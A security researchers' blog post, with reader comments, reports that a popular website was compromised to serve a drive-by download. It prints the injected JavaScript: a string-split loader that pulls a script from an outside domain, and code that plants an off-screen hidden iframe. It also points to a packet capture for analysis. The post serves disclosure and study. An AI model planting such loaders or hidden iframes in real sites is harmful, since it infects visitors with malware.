Yesterday on, Malware


On 2013-11-10 one of our research systems discovered that the website was hosting a drive-by download that installed malware on vulnerable systems that visited it. As with the compromise we posted about a few weeks ago, a very popular site serving malware can quickly compromise a large number of users. According to Alexa the site comes in at 650th most popular in the world, and 289th in the US, meaning thousands of visitors were exposed.

The exploit was served via malicious JavaScript on

// The script URL is split into fragments and concatenated at runtime so that the string never appears intact for static scanners.
var tyi = "cdm."; var itwo = "cracked"; var itto = "/"; var phw = "php"; var jfw = "src"; var fscr = "script"; var twi = "i"; var htp = "http"; var vol54 = "src";
document.write("<"+fscr+" "+jfw+"="+htp+":"+itto+""+itto+""+twi+"."+itwo+""+tyi+"com"+itto+""+twi+"."+phw+"><"+itto+""+fscr+">");

This sends a request to a domain registered on 2013-11-04, which means those responsible had the ability to serve their content from at least that early.

From there an iframe is inserted pointing to

var urla='';  // iframe target; removed from the post
var divTag=document.createElement('div');
divTag.id='ad3';  // the post's copy shows only 'ad3'; the assignment is assumed, since getElementById('ad3') below requires it
document.body.appendChild(divTag);
var fr3=document.createElement('iframe'); fr3.width='88px'; fr3.height='31px';
// Positioned 8000px off-screen so the victim never sees the exploit page load
fr3.setAttribute('style','position: absolute;left: -8000px;top: 0px;overflow-x: hidden;overflow-y: hidden;');
fr3.setAttribute('src',urla);
document.getElementById('ad3').appendChild(fr3);

From there a blend of malicious PDF, Java and HTML/JavaScript files is sent to the browser, and on success the malware itself is downloaded and installed on the compromised system, leaving the user little indication that anything has happened beyond the Java plugin launching and the system running low on memory.

As of the time of this post the malware is detected by 7 out of the 46 antivirus engines tested by

Further details of the behavior of the malware itself can be seen at

Here is a link to the full pcap (MD5 50c691bad0ba43d4370e2be0dd873e83, 4.3M) for your own further analysis and study. It seems that, intentionally or otherwise, the attackers employed some techniques that make packet analysis a bit more difficult than usual, so be prepared to go beyond your standard methodology.

We attempted to contact the site with this information, but unfortunately they provide no security contact information on their website, their [email protected] address bounces, and so far they have not responded to messages sent to their Twitter account. So if you know anyone involved in running that site, they might appreciate you sharing this post with them.


A few more details about the pcap since we've had some questions.

Frame number 66 is the response from the site (after a redirect). You can see the malicious JS inserted alongside their Twitter feed: line 1645 if you extract the text response, or search for "paddingLeftFooter twitterLogo" and you'll find it.

The request to /i.php on begins in frame 1251.

The exploits and the payload are delivered in multiple requests beginning at frames 1495, 2565, 2567, 2581, and several others. If you're exploring, the easiest way to see this part is to use 'http contains ""' as your Wireshark filter.

Happy analyzing.

Update 2013-11-14:

One of the site administrators (David Wong) has posted to their forums that the team fixed the problem on Tuesday afternoon. hxxp://

It seems as though the site being compromised and serving malware has been a recurring problem, each time met with a somewhat lax approach on their forums: "Yeah we stopped getting complaints about it and Google took us off the malware warning list or whatever was triggering it. Is anybody else getting it again?" This, combined with not alerting site visitors to what has happened or to the remediation steps they can take to clean up their systems, tends to indicate that the site should be avoided if you're concerned about malware.

4 Comments

  1. Pavle, November 13, 2013

    As a frequent user of, I’m reasonably worried by this. How would one go about containing and eliminating it, if their machine had been infected?

  2. Kris, November 14, 2013

    I think making a list of the 7 ways I feel most betrayed is in order.

  3. Mike Birchwood, November 14, 2013

    I’ll just toss out all my JS webshells then, clearly they aren’t malicious anymore.

    JavaScript has many unsafe functions, and malicious iframes are not “just annoying”, they are responsible for a ridiculous amount of drive-by downloads and theft of credentials and personal information.

    A simple search for “malicious javascript” brings a wealth of information, but here’s the top hit:

    I can’t REMEMBER the last time I saw a browser-based exploit in the wild that didn’t leverage JavaScript in some way. JS not only can be used to do sketchy shit, but in general, we can READ what’s happening with JavaScript because it runs in our client, not the server, that lets us mess with your code and perform all sorts of lovely little attacks.

    Source: CyberWarrior fighting the APT with the Big Data in The Cloud

  4. Zedben, November 14, 2013

    JavaScript isn’t as safe as you say. I understand the frustration with getting it confused with Java, but as you can see from the article it was used to cause the download of the file that caused this. Not only can it cause annoying popups, but it can also open hidden iframes to malicious URLs (among other things).

    It can be used to do a ton of stuff that the normal user would never know about. So, disabling JavaScript is not necessarily a bad idea. I have it disabled by default for sites I have never been to.

    There are many other tools out there you can use to make your site user-friendly like HTML5 and CSS3 😉

Comments are closed.
